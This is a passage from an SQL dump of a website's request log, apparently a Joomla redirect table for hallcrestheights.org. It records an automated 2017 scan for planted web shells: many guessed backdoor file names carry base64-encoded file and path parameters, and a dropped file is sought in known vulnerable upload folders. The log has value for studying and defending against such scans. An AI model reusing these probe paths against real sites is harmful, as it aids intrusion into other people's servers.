03:54:45','0000-00-00 00:00:00'),(6982,'http://hallcrestheights.org/email.php?z3=TU5WNDlZLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 03:55:19','0000-00-00 00:00:00'),(6983,'http://hallcrestheights.org/functions.php?z3=TU5WNDlZLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 03:55:54','0000-00-00 00:00:00'),(6984,'http://hallcrestheights.org/cache/news.php?z3=TU5WNDlZLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 03:56:54','0000-00-00 00:00:00'),(6985,'http://hallcrestheights.org/tmp.php?z3=TU5WNDlZLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',4,0,'2017-03-04 03:57:49','0000-00-00 00:00:00'),(6986,'http://hallcrestheights.org/shootme.php?z3=TU5WNDlZLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',7,0,'2017-03-04 03:58:25','0000-00-00 00:00:00'),(6987,'http://hallcrestheights.org/configurationbak.php?z3=TU5WNDlZLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 03:59:10','0000-00-00 00:00:00'),(6988,'http://hallcrestheights.org/robots.txt.php?z3=TU5WNDlZLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-03-04 04:00:59','0000-00-00 00:00:00'),(6989,'http://hallcrestheights.org/jconfig.php?z3=TU5WNDlZLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 04:01:28','0000-00-00 00:00:00'),(6990,'http://hallcrestheights.org/media/reads.php?z3=TU5WNDlZLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 04:02:08','0000-00-00 00:00:00'),(6991,'http://hallcrestheights.org/media/1ndex.php?z3=TU5WNDlZLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 04:02:31','0000-00-00 00:00:00'),(6992,'http://hallcrestheights.org/libraries/joomla/jmails.php?z3=TU5WNDlZLnBocA==&z4=L2xpYnJhcmllcy9qb29tbGEv',NULL,'hallcrestheights.org','',2,0,'2017-03-04 04:03:08','0000-00-00 00:00:00'),(6993,'http://hallcrestheights.org/sql_dump.php?z3=TU5WNDlZLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 04:03:46','0000-00-00 00:00:00'),(6994,'http://hallcrestheights.org/error-logs.php?z3=TU5WNDlZLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 04:04:46','0000-00-00 00:00:00'),(6995,'http://hallcrestheights.org/media/404.php?z3=TU5WNDlZLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 04:05:24','0000-00-00 00:00:00'),(6996,'http://hallcrestheights.org/media/tmp.php?z3=TU5WNDlZLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',1,0,'2017-03-04 04:06:29','0000-00-00 00:00:00'),(6997,'http://hallcrestheights.org/r3x.php?z3=TU5WNDlZLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 04:06:43','0000-00-00 00:00:00'),(6998,'http://hallcrestheights.org/log.php?z3=TU5WNDlZLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 04:07:15','0000-00-00 00:00:00'),(6999,'http://hallcrestheights.org/images/stories/0day.php?z3=TU5WNDlZLnBocA==&z4=L2ltYWdlcy9zdG9yaWVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 04:07:50','0000-00-00 00:00:00'),(7000,'http://hallcrestheights.org/includes/u2p.php?z3=TU5WNDlZLnBocA==&z4=L2luY2x1ZGVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 04:08:18','0000-00-00 00:00:00'),(7001,'http://hallcrestheights.org/images/xxx.php?z3=TU5WNDlZLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-04 04:08:47','0000-00-00 00:00:00'),(7002,'http://hallcrestheights.org/al277.php?z3=TU5WNDlZLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 04:09:04','0000-00-00 00:00:00'),(7003,'http://hallcrestheights.org/roubt.php?z3=TU5WNDlZLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-03-04 04:09:41','0000-00-00 00:00:00'),(7004,'http://hallcrestheights.org/includes.php?z3=TU5WNDlZLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 04:11:02','0000-00-00 00:00:00'),(7005,'http://hallcrestheights.org/images/al277.php?z3=TU5WNDlZLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-04 04:11:36','0000-00-00 00:00:00'),(7006,'http://hallcrestheights.org/webconfig.txt.php?z3=TU5WNDlZLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 04:12:16','0000-00-00 00:00:00'),(7007,'http://hallcrestheights.org/cache/cachee.php?z3=TU5WNDlZLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 04:13:24','0000-00-00 00:00:00'),(7008,'http://hallcrestheights.org/thumb.php?z3=TU5WNDlZLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 04:14:00','0000-00-00 00:00:00'),(7009,'http://hallcrestheights.org/configbak.php?z3=TU5WNDlZLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-03-04 04:17:14','0000-00-00 00:00:00'),(7010,'http://hallcrestheights.org/wp-main.php?z3=TU5WNDlZLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 04:18:42','0000-00-00 00:00:00'),(7011,'http://hallcrestheights.org/robot.php?z3=TU5WNDlZLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 04:19:13','0000-00-00 00:00:00'),(7012,'http://hallcrestheights.org/install.php?z3=TU5WNDlZLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 04:19:56','0000-00-00 00:00:00'),(7013,'http://hallcrestheights.org/images/1ndex.php?z3=TU5WNDlZLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-04 04:20:36','0000-00-00 00:00:00'),(7014,'http://hallcrestheights.org/dswat.org/wsdl.php?z3=TU5WNDlZLnBocA==&z4=L2Rzd2F0Lm9yZy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-04 04:21:09','0000-00-00 00:00:00'),(7015,'http://hallcrestheights.org/resd.php?z3=TU5WNDlZLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 04:21:49','0000-00-00 00:00:00'),(7016,'http://hallcrestheights.org/injctory.php?z3=TU5WNDlZLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 04:22:30','0000-00-00 00:00:00'),(7017,'http://hallcrestheights.org/mmytc.php?z3=TU5WNDlZLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 04:22:49','0000-00-00 00:00:00'),(7018,'http://hallcrestheights.org/M-F4r3s.php?z3=TU5WNDlZLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 04:23:17','0000-00-00 00:00:00'),(7019,'http://hallcrestheights.org/cache/cache_aqbmkwwx.php?z3=TU5WNDlZLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',1,0,'2017-03-04 04:25:36','0000-00-00 00:00:00'),(7020,'http://hallcrestheights.org/wsdl.php?z3=TU5WNDlZLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 04:27:03','0000-00-00 00:00:00'),(7021,'http://hallcrestheights.org/goog1es.php?z3=TU5WNDlZLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 04:27:57','0000-00-00 00:00:00'),(7022,'http://hallcrestheights.org/site/tmp/cTivrC.php?z3=TU5WNDlZLnBocA==&z4=L3NpdGUvdG1wLw==',NULL,'hallcrestheights.org','',1,0,'2017-03-04 04:28:30','0000-00-00 00:00:00'),(7023,'http://hallcrestheights.org/update.php?z3=TU5WNDlZLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 04:29:11','0000-00-00 00:00:00'),(7024,'http://hallcrestheights.org/news.php?z3=TU5WNDlZLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 04:29:36','0000-00-00 00:00:00'),(7025,'http://hallcrestheights.org/SessionController.php?z3=TU5WNDlZLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 04:30:15','0000-00-00 00:00:00'),(7026,'http://hallcrestheights.org/maill.php?z3=TU5WNDlZLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 04:30:23','0000-00-00 00:00:00'),(7027,'http://hallcrestheights.org/error-log.php?z3=TU5WNDlZLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-03-04 04:33:58','0000-00-00 00:00:00'),(7028,'http://hallcrestheights.org/M-J!r4ya-F4r3s.php?z3=TU5WNDlZLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 04:34:17','0000-00-00 00:00:00'),(7029,'http://hallcrestheights.org/authenticating.php?z3=TU5WNDlZLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 04:34:52','0000-00-00 00:00:00'),(7030,'http://hallcrestheights.org/google-assist.php?z3=TU5WNDlZLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 04:35:17','0000-00-00 00:00:00'),(7031,'http://hallcrestheights.org/images/google-assist.php?z3=TU5WNDlZLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-04 04:35:50','0000-00-00 00:00:00'),(7032,'http://hallcrestheights.org/images/robots.txt.php?z3=TU5WNDlZLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-04 04:36:28','0000-00-00 00:00:00'),(7033,'http://hallcrestheights.org/elements.php?z3=TU5WNDlZLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 04:36:52','0000-00-00 00:00:00'),(7034,'http://hallcrestheights.org/xmlsrpc.php?z3=TU5WNDlZLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 04:37:36','0000-00-00 00:00:00'),(7035,'http://hallcrestheights.org/wp-cache.php?z3=TU5WNDlZLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 04:38:17','0000-00-00 00:00:00'),(7036,'http://hallcrestheights.org/images/404.php?z3=TU5WNDlZLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-04 04:39:01','0000-00-00 00:00:00'),(7037,'http://hallcrestheights.org/images/head.php?z3=TU5WNDlZLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-04 04:39:41','0000-00-00 00:00:00'),(7038,'http://hallcrestheights.org/cache/support.php?z3=TU5WNDlZLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 04:40:21','0000-00-00 00:00:00'),(7039,'http://hallcrestheights.org/RoseLeif.php?z3=TU5WNDlZLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 04:40:54','0000-00-00 00:00:00'),(7040,'http://hallcrestheights.org/Abbrevsprl.php?z3=TU5WNDlZLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 04:41:29','0000-00-00 00:00:00'),(7041,'http://hallcrestheights.org/show.php?z3=TU5WNDlZLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 04:42:04','0000-00-00 00:00:00'),(7042,'http://hallcrestheights.org/images/defau1t.php?z3=TU5WNDlZLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',1,0,'2017-03-04 04:43:14','0000-00-00 00:00:00'),(7043,'http://hallcrestheights.org/cli/40dd1d.php?z3=TU5WNDlZLnBocA==&z4=L2NsaS8=',NULL,'hallcrestheights.org','',2,0,'2017-03-04 04:43:38','0000-00-00 00:00:00'),(7044,'http://hallcrestheights.org/bk.php?z3=TU5WNDlZLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 04:44:04','0000-00-00 00:00:00'),(7045,'http://hallcrestheights.org/infos.php?z3=TU5WNDlZLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 04:44:58','0000-00-00 00:00:00'),(7046,'http://hallcrestheights.org/cache/defau1t.php?z3=TU5WNDlZLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 04:45:37','0000-00-00 00:00:00'),(7047,'http://hallcrestheights.org/A.php?z3=TU5WNDlZLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 04:46:08','0000-00-00 00:00:00'),(7048,'http://hallcrestheights.org/bookmark.php?z3=TU5WNDlZLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 04:46:43','0000-00-00 00:00:00'),(7049,'http://hallcrestheights.org/wp-data.php?z3=TU5WNDlZLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 04:48:10','0000-00-00 00:00:00'),(7050,'http://hallcrestheights.org/wp-content/plugins/Fbrrchive.php?z3=TU5WNDlZLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-04 04:48:45','0000-00-00 00:00:00'),(7051,'http://hallcrestheights.org/wp-content/uploads/Fbrrchive.php?z3=TU5WNDlZLnBocA==&z4=L3dwLWNvbnRlbnQvdXBsb2Fkcy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-04 04:49:30','0000-00-00 00:00:00'),(7052,'http://hallcrestheights.org/wp-content/plugins/myshe.php?z3=TU5WNDlZLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-04 04:50:15','0000-00-00 00:00:00'),(7053,'http://hallcrestheights.org/wp-content/plugins/wp-cache.php?z3=TU5WNDlZLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-04 04:50:52','0000-00-00 00:00:00'),(7054,'http://hallcrestheights.org/wp-content/plugins/wp-footers.php?z3=TU5WNDlZLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-04 04:51:30','0000-00-00 00:00:00'),(7055,'http://hallcrestheights.org/wp-content/plugins/wpfootes.php?z3=TU5WNDlZLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',3,0,'2017-03-04 04:53:23','0000-00-00 00:00:00'),(7056,'http://hallcrestheights.org/wp-content/plugins/sql_dump.php?z3=TU5WNDlZLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-04 04:53:43','0000-00-00 00:00:00'),(7057,'http://hallcrestheights.org/wp-content/plugins/SocketIontrol.php?z3=TU5WNDlZLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-04 04:54:22','0000-00-00 00:00:00'),(7058,'http://hallcrestheights.org/wp-content/plugins/SocketIasrgasfontrol.php?z3=TU5WNDlZLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-04 04:55:14','0000-00-00 00:00:00'),(7059,'http://hallcrestheights.org/wp-content/plugins/caches.php?z3=TU5WNDlZLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',1,0,'2017-03-04 04:57:22','0000-00-00 00:00:00'),(7060,'http://hallcrestheights.org/head.php?z3=TU5WNDlZLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 04:57:44','0000-00-00 00:00:00'),(7061,'http://hallcrestheights.org/wp-content/plugins/Analyser.php?z3=TU5WNDlZLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-04 04:58:58','0000-00-00 00:00:00'),(7062,'http://hallcrestheights.org/cache/list.php?z3=TU5WNDlZLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',1,0,'2017-03-04 04:59:45','0000-00-00 00:00:00'),(7063,'http://hallcrestheights.org/images/interface.php?z3=TU5WNDlZLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-04 05:01:10','0000-00-00 00:00:00'),(7064,'http://hallcrestheights.org/sqldebug.php?z3=TU5WNDlZLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 05:01:52','0000-00-00 00:00:00'),(7065,'http://hallcrestheights.org/xmlrpc-activate.php?z3=TU5WNDlZLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 05:02:17','0000-00-00 00:00:00'),(7066,'http://hallcrestheights.org/keep.php?z3=TU5WNDlZLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 05:04:11','0000-00-00 00:00:00'),(7067,'http://hallcrestheights.org/tmpos.php?z3=TU5WNDlZLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 05:04:57','0000-00-00 00:00:00'),(7068,'http://hallcrestheights.org/link.php?z3=TU5WNDlZLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 05:05:48','0000-00-00 00:00:00'),(7069,'http://hallcrestheights.org/dcodzu.php?z3=TU5WNDlZLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 05:06:15','0000-00-00 00:00:00'),(7070,'http://hallcrestheights.org/codd.php?z3=TU5WNDlZLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 05:06:57','0000-00-00 00:00:00'),(7071,'http://hallcrestheights.org/cache/wcache7675n.PHP?z3=TU5WNDlZLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',1,0,'2017-03-04 05:07:39','0000-00-00 00:00:00'),(7072,'http://hallcrestheights.org/modules/mod_bookmark/helper.php?z3=TU5WNDlZLnBocA==&z4=L21vZHVsZXMvbW9kX2Jvb2ttYXJrLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 05:09:15','0000-00-00 00:00:00'),(7073,'http://hallcrestheights.org/content.php?z3=TU5WNDlZLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 05:09:58','0000-00-00 00:00:00'),(7074,'http://hallcrestheights.org/wp-content/plugins/sfn.php?z3=TU5WNDlZLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-04 05:10:43','0000-00-00 00:00:00'),(7075,'http://hallcrestheights.org/wp-content/plugins/wp-lg3.php?z3=TU5WNDlZLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',1,0,'2017-03-04 05:11:27','0000-00-00 00:00:00'),(7076,'http://hallcrestheights.org/wp-content/plugins/wp-lg2.php?z3=TU5WNDlZLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-04 05:13:17','0000-00-00 00:00:00'),(7077,'http://hallcrestheights.org/shootmei.php?z3=TU5WNDlZLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 05:14:15','0000-00-00 00:00:00'),(7078,'http://hallcrestheights.org/dcodqg.php?z3=TU5WNDlZLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 05:15:20','0000-00-00 00:00:00'),(7079,'http://hallcrestheights.org/modules/mod_simplefileuploadv1.3/elements/MNV49Y.php',NULL,'','',1,0,'2017-03-04 05:16:48','0000-00-00 00:00:00'),(7080,'http://hallcrestheights.org/wp-content/plugins/revslider/temp/update_extract/MNV49Y.php',NULL,'','',1,0,'2017-03-04 05:17:26','0000-00-00 00:00:00'),(7081,'http://hallcrestheights.org/wp-content/uploads/MNV49Y.php',NULL,'','',1,0,'2017-03-04 05:18:25','0000-00-00 00:00:00'),(7082,'http://hallcrestheights.org/MNV49Y.php',NULL,'','',1,0,'2017-03-04 05:18:59','0000-00-00 00:00:00'),(7083,'http://hallcrestheights.org/sites/all/libraries/elfinder/files/MNV49Y.php',NULL,'','',1,0,'2017-03-04 05:19:27','0000-00-00 00:00:00'),(7084,'http://hallcrestheights.org/sqlbak.php?z3=MzlhWlFLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-03-04 05:22:51','0000-00-00 00:00:00'),(7085,'http://hallcrestheights.org/sql-bak.php?z3=MzlhWlFLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-03-04 05:24:37','0000-00-00 00:00:00'),(7086,'http://hallcrestheights.org/email.php?z3=MzlhWlFLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 05:24:40','0000-00-00 00:00:00'),(7087,'http://hallcrestheights.org/functions.php?z3=MzlhWlFLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 05:24:47','0000-00-00 00:00:00'),(7088,'http://hallcrestheights.org/cache/news.php?z3=MzlhWlFLLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 05:24:55','0000-00-00 00:00:00'),(7089,'http://hallcrestheights.org/tmp.php?z3=MzlhWlFLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 05:24:58','0000-00-00 00:00:00'),(7090,'http://hallcrestheights.org/shootme.php?z3=MzlhWlFLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 05:25:06','0000-00-00 00:00:00'),(7091,'http://hallcrestheights.org/configurationbak.php?z3=MzlhWlFLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 05:25:10','0000-00-00 00:00:00'),(7092,'http://hallcrestheights.org/robots.txt.php?z3=MzlhWlFLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 05:25:14','0000-00-00 00:00:00'),(7093,'http://hallcrestheights.org/sql-bak.php?z3=OUdSREJ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 05:37:03','0000-00-00 00:00:00'),(7094,'http://hallcrestheights.org/email.php?z3=OUdSREJ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-03-04 05:37:33','0000-00-00 00:00:00'),(7095,'http://hallcrestheights.org/functions.php?z3=OUdSREJ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 05:37:36','0000-00-00 00:00:00'),(7096,'http://hallcrestheights.org/cache/news.php?z3=OUdSREJ2LnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 05:37:44','0000-00-00 00:00:00'),(7097,'http://hallcrestheights.org/tmp.php?z3=OUdSREJ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',4,0,'2017-03-04 05:37:47','0000-00-00 00:00:00'),(7098,'http://hallcrestheights.org/shootme.php?z3=OUdSREJ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',7,0,'2017-03-04 05:37:58','0000-00-00 00:00:00'),(7099,'http://hallcrestheights.org/configurationbak.php?z3=OUdSREJ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 05:38:13','0000-00-00 00:00:00'),(7100,'http://hallcrestheights.org/robots.txt.php?z3=OUdSREJ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-03-04 05:38:22','0000-00-00 00:00:00'),(7101,'http://hallcrestheights.org/jconfig.php?z3=OUdSREJ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 05:39:29','0000-00-00 00:00:00'),(7102,'http://hallcrestheights.org/media/reads.php?z3=OUdSREJ2LnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',1,0,'2017-03-04 05:39:55','0000-00-00 00:00:00'),(7103,'http://hallcrestheights.org/media/1ndex.php?z3=OUdSREJ2LnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',1,0,'2017-03-04 05:41:41','0000-00-00 00:00:00'),(7104,'http://hallcrestheights.org/libraries/joomla/jmails.php?z3=OUdSREJ2LnBocA==&z4=L2xpYnJhcmllcy9qb29tbGEv',NULL,'hallcrestheights.org','',2,0,'2017-03-04 05:42:29','0000-00-00 00:00:00'),(7105,'http://hallcrestheights.org/sql_dump.php?z3=OUdSREJ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 05:42:34','0000-00-00 00:00:00'),(7106,'http://hallcrestheights.org/error-logs.php?z3=OUdSREJ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 05:42:40','0000-00-00 00:00:00'),(7107,'http://hallcrestheights.org/media/404.php?z3=OUdSREJ2LnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 05:42:45','0000-00-00 00:00:00'),(7108,'http://hallcrestheights.org/media/tmp.php?z3=OUdSREJ2LnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 05:42:50','0000-00-00 00:00:00'),(7109,'http://hallcrestheights.org/r3x.php?z3=OUdSREJ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 05:42:54','0000-00-00 00:00:00'),(7110,'http://hallcrestheights.org/log.php?z3=OUdSREJ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 05:42:57','0000-00-00 00:00:00'),(7111,'http://hallcrestheights.org/images/stories/0day.php?z3=OUdSREJ2LnBocA==&z4=L2ltYWdlcy9zdG9yaWVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 05:43:04','0000-00-00 00:00:00'),(7112,'http://hallcrestheights.org/includes/u2p.php?z3=OUdSREJ2LnBocA==&z4=L2luY2x1ZGVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 05:43:08','0000-00-00 00:00:00'),(7113,'http://hallcrestheights.org/images/xxx.php?z3=OUdSREJ2LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-04 05:43:12','0000-00-00 00:00:00'),(7114,'http://hallcrestheights.org/al277.php?z3=OUdSREJ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 05:43:16','0000-00-00 00:00:00'),(7115,'http://hallcrestheights.org/roubt.php?z3=OUdSREJ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 05:43:20','0000-00-00 00:00:00'),(7116,'http://hallcrestheights.org/includes.php?z3=OUdSREJ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 05:43:24','0000-00-00 00:00:00'),(7117,'http://hallcrestheights.org/images/al277.php?z3=OUdSREJ2LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-04 05:43:29','0000-00-00 00:00:00'),(7118,'http://hallcrestheights.org/webconfig.txt.php?z3=OUdSREJ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 05:43:32','0000-00-00 00:00:00'),(7119,'http://hallcrestheights.org/cache/cachee.php?z3=OUdSREJ2LnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 05:43:40','0000-00-00 00:00:00'),(7120,'http://hallcrestheights.org/thumb.php?z3=OUdSREJ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 05:43:49','0000-00-00 00:00:00'),(7121,'http://hallcrestheights.org/configbak.php?z3=OUdSREJ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 05:44:00','0000-00-00 00:00:00'),(7122,'http://hallcrestheights.org/wp-main.php?z3=OUdSREJ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 05:44:06','0000-00-00 00:00:00'),(7123,'http://hallcrestheights.org/robot.php?z3=OUdSREJ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 05:44:14','0000-00-00 00:00:00'),(7124,'http://hallcrestheights.org/install.php?z3=OUdSREJ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-03-04 05:44:29','0000-00-00 00:00:00'),(7125,'http://hallcrestheights.org/images/1ndex.php?z3=OUdSREJ2LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-04 05:44:57','0000-00-00 